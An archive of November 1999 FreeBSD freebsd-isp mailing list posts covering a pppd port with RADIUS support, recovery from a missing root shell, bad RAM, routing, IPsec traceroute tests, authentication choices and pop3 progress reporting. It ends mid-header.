From owner-freebsd-isp Mon Nov 1 4:14:49 1999 Delivered-To: freebsd-isp@freebsd.org Received: from techpower.net (techpower.net [205.133.231.1]) by hub.freebsd.org (Postfix) with ESMTP id 0D07A14FD8; Mon, 1 Nov 1999 04:14:44 -0800 (PST) (envelope-from hometeam@techpower.net) Received: from localhost (hometeam@localhost) by techpower.net (8.9.3/8.9.3) with ESMTP id IAA00248; Mon, 1 Nov 1999 08:11:23 GMT (envelope-from hometeam@techpower.net) Date: Mon, 1 Nov 1999 08:11:23 +0000 (GMT) From: hometeam To: Oleg Semyonov Cc: peter@FreeBSD.ORG, freebsd-isp@FreeBSD.ORG Subject: Re: pppd-2.3.10 + RADIUS In-Reply-To: <000701bf220e$fccdde60$0400a8c0@admin.dnepr.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org BTW: will 2.3.10 be introduced in to ports & Stable anytime soon ? Seems like where a bit behind on pppd. On Fri, 29 Oct 1999, Oleg Semyonov wrote: > Hi peter@freebsd.org! > > As I can see you're a maintainer of pppd port for FreeBSD. > Long time the pppd exists in FreeBSD as patched 2.3.5 version > which has some bugs (e.g. "*" only in allowed address list with no > DNS available leads to long delays for gethostbyname("*") which > prevents the login by timeout hangup, and so on.). > > Just now I've almost done my work with pppd-2.3.10 sources. > Patches for FreeBSD are based on pppd in current FreeBSD distribution > with minor changes for new pppd features (optional option list > in secrets file and so on). Futuremore, I've implemented the > RADIUS support for authentication and accounting. The support is > based on standard FreeBSD radius library by John Polstra, > it may be compiled-in by request (USE_RADIUS=y in Makefile) > with optional base config path (/etc/ppp or /etc/ppp-radius and > so on), and it includes support for: > > - new RADIUS-oriented pppd options: > - radius (use RADIUS) > - radius-conf /path/file (conf file for radius library) > - radius-only (don't try to auth with secrets or login > methods if radius returns Access-Reject) > - radius-noacct (don't send accounting requests) > - radius-port (device name to port number translation) > - support for PAP authentication (no CHAP or CALLBACK, sorry); > - new script environment variables (CALLED_STATION_ID, CALLING_STATION_ID, > CONNECT_INFO, SENT_PACKETS, RCVD_PACKETS, and received from RADIUS > server); > - supported RADIUS attributes are: > - in Access-Request: > User-Name > User-Password > NAS-IP-Address (gethostname()) > NAS-Identifier (gethostbyname()) > NAS-Port (from device to port translation) > NAS-Port-Type (Async only) > Service-Type (Framed) > Framed-Protocol (PPP) > Framed-IP-Address > Framed-Compression (VJ-TCPIP only, no IPX supported) > Called-Station-Id (from pppd's environment) > Calling-Station-Id (from pppd's environment, passed by mgetty, e.g.) > Connect-Info (from pppd's environment, passed by mgetty, e.g.) > PPPD-Script-Env (pppd script env vars, vendor-specific attribute) > - in Access-Accept/Reject also recognised (with mentioned above): > Framed-IP-Netmask > Framed-Routing (not used yet) > Filter-Id (not used yet) > Framed-MTU > Reply-Message (first message is used only) > Framed-Route (not used yet) > Class (passed through in accounting requests) > Session-Timeout > Idle-Timeout > PPPD-Option (additional pppd options, vendor-specific attribute) > PPPD-Script-Env (additional script env vars, vendor-specific > attribute) > - in Accounting-Request START packet also passed (with mentioned above): > Acct-Status-Type (Start, Stop) > Acct-Session-Id > Acct-Authentic (RADIUS only) > - in Accounting-Request STOP packet also passed (with mentioned above): > Acct-Input-Octets > Acct-Output-Octets > Acct-Input-Packets > Acct-Output-Packets > Acct-Session-Time > Acct-Terminate-Cause (not so good but something useful) > > Most of attributes are passed in accounting requests (all script env > vars and additional pppd options for local IP address or so). > > RADIUS support isn't done as loadable plugin. First reason is the > pppd must work (for me) on 2.2.8 system which does not support some > required features (-E switch for ld, for example). Second, there is > no some required hooks and global variables for implement all features > I need. > > The code is slightly tested with Steel-Belted RADIUS for WinNT and with > Cistron radiusd-1.6.1 and seems to work fine for me. > > Is it possible to test and include the code into FreeBSD distribution > or port collection? Seems too many people want to install newest pppd > version but some small incompatibilities in original pppd code may > prevent it for not so qualified users. > > Any opinions? > > --- > Oleg Semyonov, the Head of IT Department of KTPK "Dnepr", Energodar, UA > Internet mail: os@altavista.net, finger/talk: os@ktpk.dp.ua, ICQ:31256452 > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-isp" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Mon Nov 1 9:23: 2 1999 Delivered-To: freebsd-isp@freebsd.org Received: from srvr1.swpc.net (srvr1.swpc.net [207.138.68.2]) by hub.freebsd.org (Postfix) with ESMTP id 475BC14D9C for ; Mon, 1 Nov 1999 09:22:54 -0800 (PST) (envelope-from royd@swpc.net) Received: from swpc.net (apollo-007.swpc.net [207.138.68.106]) by srvr1.swpc.net (8.9.1/8.9.1) with ESMTP id KAA21247 for ; Mon, 1 Nov 1999 10:22:49 -0700 (MST) Message-ID: <381DCC66.CC1A8FEB@swpc.net> Date: Mon, 01 Nov 1999 10:22:46 -0700 From: "Roy Dorris, CRL" X-Mailer: Mozilla 4.51 [en] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-isp@freebsd.org Subject: (no subject) Content-Type: text/plain; charset=x-user-defined Content-Transfer-Encoding: 7bit Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org subscribe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Mon Nov 1 13:41:17 1999 Delivered-To: freebsd-isp@freebsd.org Received: from sneakerz.org (sneakerz.org [208.176.135.226]) by hub.freebsd.org (Postfix) with SMTP id 391CB14E74 for ; Mon, 1 Nov 1999 13:41:06 -0800 (PST) (envelope-from dave@sneakerz.org) Received: (qmail 8510 invoked by uid 1004); 27 Oct 1999 05:25:49 -0000 Date: Tue, 26 Oct 1999 22:25:49 -0700 From: "Dr. Dave" To: jahanur Cc: freebsd-isp@freebsd.org Subject: Re: root access problem please help. Message-ID: <19991026222549.A8498@sneakerz.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: ; from jahanur on Mon, Oct 25, 1999 at 06:51:52PM -0500 Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Oct 25, 1999 at 06:51:52PM -0500, jahanur wrote: > HI, everybody, > I have got a major problem. > Whenever I try to login as root it says "su: /bin/bash: No such file or > directory". You know, if you have ssh installed on your system, you could ssh into the box and have it spawn a new shell.. ssh root@host.com '/bin/sh' or something of that sort should work. -- -------------------------------------------------------------------------- Dave McKay dave@sneakerz.org MSN Hotmail http://www.hotmail.com -------------------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Mon Nov 1 13:48:31 1999 Delivered-To: freebsd-isp@freebsd.org Received: from dexter.lcsd2.org (ns1.linc2.k12.wy.us [209.181.17.10]) by hub.freebsd.org (Postfix) with ESMTP id 47B611535A for ; Mon, 1 Nov 1999 13:48:16 -0800 (PST) (envelope-from traviss@lcsd2.org) Received: from lcsd2.org (webuser@int-ns1.linc2.k12.wy.us [137.90.169.42] (may be forged)) by dexter.lcsd2.org (8.9.2/8.9.2) with SMTP id OAA50632 for freebsd-isp@freebsd.org; Mon, 1 Nov 1999 14:48:12 -0700 (MST) (envelope-from traviss@lcsd2.org) Date: Mon, 1 Nov 1999 14:48:12 -0700 (MST) Message-Id: <199911012148.OAA50632@dexter.lcsd2.org> To: freebsd-isp@freebsd.org Subject: Re: root access problem help From: Travis Stevenson X-Mailer: LiNCNet! WebMail 1.9 Read-Recipt: yes Reply-To: tstevenson@lcsd2.org Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Oct 25, 1999 at 06:51:52PM -0500, jahanur wrote: > HI, everybody, > I have got a major problem. > Whenever I try to login as root it says "su: /bin/bash: No such file or > directory". > You know, if you have ssh installed on your system, you could ssh into the box > and have it spawn a new shell.. ssh root@host.com '/bin/sh' or something of > that sort should work. Wouldn't it be easier to shutdown into single user mode and reselect a shell? -- Travis Stevenson, MCSE Lincoln County School District #2 Fingerprint: CA26 B3E7 DDFC A8B8 0AA7 A559 035D AA5A 7E29 B1E4 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Mon Nov 1 13:54:57 1999 Delivered-To: freebsd-isp@freebsd.org Received: from ns2.jjsoft.com (fig2.figdav.com [208.152.114.19]) by hub.freebsd.org (Postfix) with ESMTP id 53E16152F2 for ; Mon, 1 Nov 1999 13:54:47 -0800 (PST) (envelope-from jahanur@jjsoft.com) Received: from localhost (jahanur@localhost) by ns2.jjsoft.com (8.9.0/8.9.0) with SMTP id PAA05599; Mon, 1 Nov 1999 15:54:38 -0600 (CST) Date: Mon, 1 Nov 1999 15:54:38 -0600 (CST) From: jahanur To: "Dr. Dave" Cc: freebsd-isp@FreeBSD.ORG Subject: Re: root access problem please help. In-Reply-To: <19991026222549.A8498@sneakerz.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thank you for your help. I have finaly fixed it by booting up in single user mode. On Tue, 26 Oct 1999, Dr. Dave wrote: > On Mon, Oct 25, 1999 at 06:51:52PM -0500, jahanur wrote: > > HI, everybody, > > I have got a major problem. > > Whenever I try to login as root it says "su: /bin/bash: No such file or > > directory". > > You know, if you have ssh installed on your system, you could ssh into the box and have it spawn a new shell.. ssh root@host.com '/bin/sh' or something of that sort should work. > > -- > -------------------------------------------------------------------------- > Dave McKay dave@sneakerz.org > MSN Hotmail http://www.hotmail.com > -------------------------------------------------------------------------- > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-isp" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Tue Nov 2 12:24:14 1999 Delivered-To: freebsd-isp@freebsd.org Received: from bluerose.windmoon.nu (c255152-a.plstn1.sfba.home.com [24.7.89.179]) by hub.freebsd.org (Postfix) with ESMTP id B82C914F10 for ; Tue, 2 Nov 1999 12:24:06 -0800 (PST) (envelope-from fengyue@bluerose.windmoon.nu) Received: from localhost (fengyue@localhost) by bluerose.windmoon.nu (Windmoon-Patched/8.9.3/8.9.3) with ESMTP id MAA32027; Tue, 2 Nov 1999 12:29:09 -0800 (PST) Date: Tue, 2 Nov 1999 12:29:09 -0800 (PST) From: FengYue To: "Paul Stewart (Premier Networks)" Cc: freebsd-isp@FreeBSD.ORG Subject: Re: FreebSD bug or defect RAM/motherboard? In-Reply-To: <381C46FA.40AA5DCF@premier-networks.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thanks for the input. After I got physical access to the machine, it turned out to be a defect RAM. So at least ASUS p3b-f was not the problem ( it's a bit new motherboard and I was afarid it may have some hardware bugs...etc). Ming On Sun, 31 Oct 1999, Paul Stewart (Premier Networks) wrote: > I'm guessing hardware.... > > We're just moving into new facilities here with more T1's and brand new > servers etc.... > > Four of the new servers all core dumped during or shortly after > installing FreeBSD on them (3.3).... first install of 3.3 so we > installed Windows NT onto them to see what would happen.... crashed and > blue screened really ugly like.... so, we thought that well, NT crashes > on it's best days so we'd install Linux 6.1 (which was successfully > installed on a person machine that's identicial from a few days > before)... again, crashed before even formatting the drives.... > > So, we have 4 dead servers on their way back to the suppliers... > > Hope this helps, > > Paul To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Tue Nov 2 12:29:13 1999 Delivered-To: freebsd-isp@freebsd.org Received: from bluerose.windmoon.nu (c255152-a.plstn1.sfba.home.com [24.7.89.179]) by hub.freebsd.org (Postfix) with ESMTP id 996D015328 for ; Tue, 2 Nov 1999 12:29:11 -0800 (PST) (envelope-from fengyue@bluerose.windmoon.nu) Received: from localhost (fengyue@localhost) by bluerose.windmoon.nu (Windmoon-Patched/8.9.3/8.9.3) with ESMTP id MAA32037 for ; Tue, 2 Nov 1999 12:34:28 -0800 (PST) Date: Tue, 2 Nov 1999 12:34:28 -0800 (PST) From: FengYue To: freebsd-isp@FreeBSD.ORG Subject: Re: root access problem help In-Reply-To: <199911012148.OAA50632@dexter.lcsd2.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 1 Nov 1999, Travis Stevenson wrote: > On Mon, Oct 25, 1999 at 06:51:52PM -0500, jahanur wrote: > > You know, if you have ssh installed on your system, you could ssh into the box > > and have it spawn a new shell.. ssh root@host.com '/bin/sh' or something of > > that sort should work. > > Wouldn't it be easier to shutdown into single user mode and reselect a shell? Probably not a nice thing to do if that's a production server. Or he can login as a regular user and use su -m To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Wed Nov 3 7:27: 3 1999 Delivered-To: freebsd-isp@freebsd.org Received: from ns1.walls-media.com (ns1.walls-media.com [12.6.126.2]) by hub.freebsd.org (Postfix) with ESMTP id 3B2CB14EBB for ; Wed, 3 Nov 1999 07:26:57 -0800 (PST) (envelope-from bryanb@walls-media.com) Received: from ntwksbry ([12.6.126.58]) by ns1.walls-media.com (Post.Office MTA Undefined release Undefined ID# 0-0U10L2S100V35) with SMTP id com for ; Wed, 3 Nov 1999 09:24:56 -0600 From: "Bryan Bunch" To: Subject: Routing Question.. Date: Wed, 3 Nov 1999 09:25:09 -0600 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Importance: Normal Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello All, I have a strange routing situation that I hope someone can help me with. First off, here's my config. Currently have three networks: 1.2.3.0 2.3.4.0 6.7.8.0 I have two routers on the network that have a primary and secondary address attached to their ethernet interfaces (Cisco 2501). Router 1: 1.2.3.1 2.3.4.1 - secondary Default route statement for above router: ip route 6.7.8.0 255.255.255.0 2.3.4.3 Router 2: 6.7.8.254 2.3.4.3 - secondary Default route statement for above router: ip route 1.2.3.0 255.255.255.0 2.3.4.1 I have a 3.3-STABLE box that has the following addressing: ifconfig_tl0="inet 6.7.8.2 netmask 255.255.255.0" ifconfig_tl0_alias0="inet 1.2.3.185 netmask 255.255.255.255" # Sample alias entry. defaultrouter="6.7.8.254" On any machine on the local network everything works fine, I can get to both addresses on the above box. But if I am on a machine that is outside of my network I can only get to the 6.7.8.2 interface, I cannot ping the 1.2.3.185 interface. Again, everything works fine from the local network. Interestingly enough, if I change my config to: ifconfig_tl0="inet 1.2.3.185 netmask 255.255.255.0" ifconfig_tl0_alias0="inet 6.7.8.2 netmask 255.255.255.255" # Sample alias entry. defaultrouter="1.2.3.185" Everything works fine both inside and outside of the network. What am I missing? Any help is greatly appreciated. Bryan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Wed Nov 3 8:44:41 1999 Delivered-To: freebsd-isp@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id 1265F14DD9 for ; Wed, 3 Nov 1999 08:44:35 -0800 (PST) (envelope-from sthaug@nethelp.no) Received: (qmail 3054 invoked by uid 1001); 3 Nov 1999 16:43:00 +0000 (GMT) To: freebsd-isp@freebsd.org, freebsd-hackers@freebsd.org Subject: Need help to run IP protocol 50 traceroute from Hong Kong From: sthaug@nethelp.no X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Wed, 03 Nov 1999 17:43:00 +0100 Message-ID: <3052.941647380@verdi.nethelp.no> Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org (Warning: Unrelated to FreeBSD except for the fact that FreeBSD-current and recent -stable traceroute supports the -P option.) I need to find out if IP protocol 50 (used by IPSec) is being blocked on the way from Hong Kong to a customer of Telia in Norway. Could somebody in or near Hong Kong, running FreeBSD-current or FreeBSD 3.3, please send me the output of "traceroute -P 50 flow1.telia.no". I'm particularly interested if you get a "!P" (protocol unreachable) on the way. This is what a normal traceroute looks like from Hongkong Telecom Netplus, http://traceroute.hkt.net/cgi-bin/nph-traceroute but of course this doesn't tell me anything about IP protocol 50. Thanks in advance! Steinar Haug, Nethelp consulting, sthaug@nethelp.no ---------------------------------------------------------------------- traceroute to flow1.telia.no (194.19.1.190): 1-30 hops, 38 byte packets 1 e1-3.tmh08.hkt.net (202.84.255.62) 1.24 ms 0.657 ms 0.722 ms 2 a5-0-1.yck05.hkt.net (205.252.130.82) 1.56 ms 4.21 ms 2.10 ms 3 f5-0.hk-T3.hkt.net (205.252.130.207) 2.10 ms 1.53 ms 1.95 ms 4 hssi8-0-0.paix-T3.hkt.net (202.84.128.254) 201 ms 207 ms 198 ms 5 915.Hssi5-0.GW1.PAO1.ALTER.NET (157.130.193.133) 195 ms (ttl=248!) 184 ms (ttl=248!) 181 ms (ttl=248!) 6 119.ATM3-0.XR2.PAO1.ALTER.NET (146.188.147.230) 187 ms (ttl=249!) 192 ms (ttl=249!) 184 ms (ttl=249!) 7 188.ATM7-0.XR2.SFO4.ALTER.NET (146.188.146.230) 185 ms 202 ms 189 ms 8 190.ATM11-0-0.GW4.SJC2.ALTER.NET (152.63.51.133) 206 ms 194 ms 189 ms 9 telia-gw.customer.ALTER.NET (157.130.229.118) 268 ms (ttl=246!) * 264 ms (ttl=246!) 10 sf-b1-atm3-0-103.telia.net (209.95.159.41) 266 ms 272 ms 265 ms 11 ny-b1-pos5-0-0.telia.net (209.95.159.22) 260 ms (ttl=247!) 261 ms (ttl=247!) 261 ms (ttl=247!) 12 sto-b1-pos1-0.telia.net (194.17.1.185) 363 ms (ttl=246!) 362 ms (ttl=246!) 361 ms (ttl=246!) 13 ov-i9-atm3-0-0-1.telia.net (194.17.1.110) 371 ms (ttl=245!) 368 ms (ttl=245!) * 14 no-oso-i1.telia.net (194.19.1.145) 398 ms (ttl=244!) 417 ms (ttl=244!) 389 ms (ttl=244!) 15 oslo-accl1.telia.net (194.19.1.116) 383 ms (ttl=243!) 379 ms (ttl=243!) 397 ms (ttl=243!) 16 flow1.telia.no (194.19.1.190) * 377 ms (ttl=242!) 378 ms (ttl=242!) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Wed Nov 3 9:24: 0 1999 Delivered-To: freebsd-isp@freebsd.org Received: from alpo.whistle.com (alpo.whistle.com [207.76.204.38]) by hub.freebsd.org (Postfix) with ESMTP id BAD771557A; Wed, 3 Nov 1999 09:23:47 -0800 (PST) (envelope-from julian@whistle.com) Received: from current1.whiste.com (current1.whistle.com [207.76.205.22]) by alpo.whistle.com (8.9.1a/8.9.1) with ESMTP id JAA30666; Wed, 3 Nov 1999 09:22:29 -0800 (PST) Date: Wed, 3 Nov 1999 09:22:29 -0800 (PST) From: Julian Elischer To: sthaug@nethelp.no Cc: freebsd-isp@FreeBSD.ORG, freebsd-hackers@FreeBSD.ORG Subject: Re: Need help to run IP protocol 50 traceroute from Hong Kong In-Reply-To: <3052.941647380@verdi.nethelp.no> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 3 Nov 1999 sthaug@nethelp.no wrote: > (Warning: Unrelated to FreeBSD except for the fact that FreeBSD-current > and recent -stable traceroute supports the -P option.) > > I need to find out if IP protocol 50 (used by IPSec) is being blocked on > the way from Hong Kong to a customer of Telia in Norway. Could somebody > in or near Hong Kong, running FreeBSD-current or FreeBSD 3.3, please send > me the output of "traceroute -P 50 flow1.telia.no". I'm particularly > interested if you get a "!P" (protocol unreachable) on the way. > > This is what a normal traceroute looks like from Hongkong Telecom Netplus, > > http://traceroute.hkt.net/cgi-bin/nph-traceroute > > but of course this doesn't tell me anything about IP protocol 50. it would if you used the -P 50 argument TRACEROUTE(8) TRACEROUTE(8) NAME traceroute - print the route packets take to network host SYNOPSIS traceroute [ -Sdnrv ] [ -g gw_host ] [ -M min_ttl ] [ -m max_ttl ] [ -P proto ] [ -p port ] [ -q nqueries ] [ -s src_addr ] [ -t tos ] [ -w waittime ] host [ packetlen ] [...] -P Send packets of specified IP protocol. The cur- rently supported protocols are: UDP, TCP and GRE. Other protocols may also be specified (either by name or by number), though traceroute does not implement any special knowledge of their packet formats. This option is useful for determining which router along a path may be blocking packets based on IP protocol number. But see BUGS below. > > Thanks in advance! > > Steinar Haug, Nethelp consulting, sthaug@nethelp.no > ---------------------------------------------------------------------- > traceroute to flow1.telia.no (194.19.1.190): 1-30 hops, 38 byte packets > 1 e1-3.tmh08.hkt.net (202.84.255.62) 1.24 ms 0.657 ms 0.722 ms > 2 a5-0-1.yck05.hkt.net (205.252.130.82) 1.56 ms 4.21 ms 2.10 ms > 3 f5-0.hk-T3.hkt.net (205.252.130.207) 2.10 ms 1.53 ms 1.95 ms > 4 hssi8-0-0.paix-T3.hkt.net (202.84.128.254) 201 ms 207 ms 198 ms > 5 915.Hssi5-0.GW1.PAO1.ALTER.NET (157.130.193.133) 195 ms (ttl=248!) 184 ms (ttl=248!) 181 ms (ttl=248!) > 6 119.ATM3-0.XR2.PAO1.ALTER.NET (146.188.147.230) 187 ms (ttl=249!) 192 ms (ttl=249!) 184 ms (ttl=249!) > 7 188.ATM7-0.XR2.SFO4.ALTER.NET (146.188.146.230) 185 ms 202 ms 189 ms > 8 190.ATM11-0-0.GW4.SJC2.ALTER.NET (152.63.51.133) 206 ms 194 ms 189 ms > 9 telia-gw.customer.ALTER.NET (157.130.229.118) 268 ms (ttl=246!) * 264 ms (ttl=246!) > 10 sf-b1-atm3-0-103.telia.net (209.95.159.41) 266 ms 272 ms 265 ms > 11 ny-b1-pos5-0-0.telia.net (209.95.159.22) 260 ms (ttl=247!) 261 ms (ttl=247!) 261 ms (ttl=247!) > 12 sto-b1-pos1-0.telia.net (194.17.1.185) 363 ms (ttl=246!) 362 ms (ttl=246!) 361 ms (ttl=246!) > 13 ov-i9-atm3-0-0-1.telia.net (194.17.1.110) 371 ms (ttl=245!) 368 ms (ttl=245!) * > 14 no-oso-i1.telia.net (194.19.1.145) 398 ms (ttl=244!) 417 ms (ttl=244!) 389 ms (ttl=244!) > 15 oslo-accl1.telia.net (194.19.1.116) 383 ms (ttl=243!) 379 ms (ttl=243!) 397 ms (ttl=243!) > 16 flow1.telia.no (194.19.1.190) * 377 ms (ttl=242!) 378 ms (ttl=242!) > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-hackers" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Wed Nov 3 9:28:34 1999 Delivered-To: freebsd-isp@freebsd.org Received: from iwill.win.net (iwill.win.net [216.24.1.213]) by hub.freebsd.org (Postfix) with ESMTP id 73B7A14E61 for ; Wed, 3 Nov 1999 09:28:24 -0800 (PST) (envelope-from kstone@win.net) Received: from localhost (stone@localhost) by iwill.win.net (8.9.3/8.9.3) with ESMTP id RAA31781 for ; Wed, 3 Nov 1999 17:28:33 GMT (envelope-from kstone@win.net) From: kstone@win.net X-Authentication-Warning: iwill.win.net: stone owned process doing -bs Date: Wed, 3 Nov 1999 17:28:33 +0000 (GMT) X-Sender: stone@iwill.win.net To: freebsd-isp@FreeBSD.ORG Subject: NIS/Radius, LDAP/K5, etc.. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm in the process of determining what sort of centralized user auth to implament. I currently need to provide authentication for POP3, dial-up, shell access, and provide UID/GIDS, etc to processes like Apache. These auth/account info services should also be redundant, replicatable and encrypted enough for use across a WAN. Anyone have suggestions as to what I should use for auth and account info distribution? Kyle Stone kstone@win.net System Engineer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Wed Nov 3 11:27:16 1999 Delivered-To: freebsd-isp@freebsd.org Received: from mirage.nlink.com.br (mirage.nlink.com.br [200.249.195.3]) by hub.freebsd.org (Postfix) with ESMTP id 257C415516 for ; Wed, 3 Nov 1999 11:26:56 -0800 (PST) (envelope-from paulo@nlink.com.br) Received: from localhost (paulo@localhost) by mirage.nlink.com.br (8.9.3/8.9.1) with SMTP id RAA21960 for ; Wed, 3 Nov 1999 17:26:12 -0200 (EDT) Date: Wed, 3 Nov 1999 17:26:12 -0200 (EDT) From: Paulo Fragoso To: freebsd-isp@freebsd.org Subject: Mail.local quota Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, Are there any patch to fix quota for mail.local sent in FreeBSD-3.3-RELEASE? There was one patch for mail.local used on 2.1.x Thanks, Paulo Fragoso. ------ " ... Overall we've found FreeBSD to excel in performace, stability, technical support, and of course price. Two years after discovering FreeBSD, we have yet to find a reason why we switch to anything else" -David Filo, Yahoo! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Wed Nov 3 11:46:54 1999 Delivered-To: freebsd-isp@freebsd.org Received: from kronos.alcnet.com (kronos.alcnet.com [63.69.28.22]) by hub.freebsd.org (Postfix) with ESMTP id 1A8C11551C for ; Wed, 3 Nov 1999 11:46:46 -0800 (PST) (envelope-from kbyanc@posi.net) X-Provider: ALC Communications, Inc. http://www.alcnet.com/ Received: from localhost (kbyanc@localhost) by kronos.alcnet.com (8.9.3/8.9.3/antispam) with ESMTP id OAA49175; Wed, 3 Nov 1999 14:46:37 -0500 (EST) Date: Wed, 3 Nov 1999 14:46:37 -0500 (EST) From: Kelly Yancey X-Sender: kbyanc@kronos.alcnet.com To: Julian Elischer Cc: freebsd-isp@FreeBSD.ORG Subject: Re: Need help to run IP protocol 50 traceroute from Hong Kong In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > > > I need to find out if IP protocol 50 (used by IPSec) is being blocked on > > the way from Hong Kong to a customer of Telia in Norway. Could somebody [ . . . ] > > > > > > but of course this doesn't tell me anything about IP protocol 50. > > it would if you used the -P 50 argument > [ traceroute(8) clipped ] I think the point was that he suspects IPsec packets are getting filtered in route and would like it if someone could verify this by doing the same traceroute. He included a copy of the regular traceroute so we could see that "normal" IP packets are getting through fine, just not IPsec. Kelly -- Kelly Yancey - kbyanc@posi.net - Richmond, VA Director of Technical Services, ALC Communications http://www.alcnet.com/ Maintainer, BSD Driver Database http://www.posi.net/freebsd/drivers/ Coordinator, Team FreeBSD http://www.posi.net/freebsd/Team-FreeBSD/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Wed Nov 3 14:55:26 1999 Delivered-To: freebsd-isp@freebsd.org Received: from arnold.neland.dk (mail.neland.dk [194.255.12.232]) by hub.freebsd.org (Postfix) with ESMTP id 7F50215643 for ; Wed, 3 Nov 1999 14:55:18 -0800 (PST) (envelope-from leif@neland.dk) Received: from gina (gina.neland.dk [192.168.0.14]) by arnold.neland.dk (8.9.3/8.9.3) with SMTP id XAA30912 for ; Wed, 3 Nov 1999 23:55:01 +0100 (CET) (envelope-from leif@neland.dk) Message-ID: <018a01bf264e$765a57c0$0e00a8c0@neland.dk> From: "Leif Neland" To: Subject: Query pop3-server of progress Date: Wed, 3 Nov 1999 23:49:13 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2314.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Sometimes a customer calls support saying he can't get his mail from the = pop3-server. Often it's just because the progress-meter doesn't move very quickly = when his mailbox contains an 8MB-attachment containing a funny avi a = 'friend' has sent him. We're using qpopper, but wouldn't mind changing if something else could = provide this. Could this be implemented, and has somebody done it? pid=3D`ps axuw|grep popper|grep $username|grep -v grep` kill -USR1 $pid sleep 5 cat /tmp/popstat.$pid The pop3-server should dump some stats in a file, eg number of files sent and total number of bytes sent and total perhaps even transfer speed and eta. This could be accessed from a cgi Good idea, right? :-) Leif =20 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Wed Nov 3 14:55:33 1999 Delivered-To: freebsd-isp@freebsd.org Received: from arnold.neland.dk (mail.neland.dk [194.255.12.232]) by hub.freebsd.org (Postfix) with ESMTP id 745C915640 for ; Wed, 3 Nov 1999 14:55:17 -0800 (PST) (envelope-from 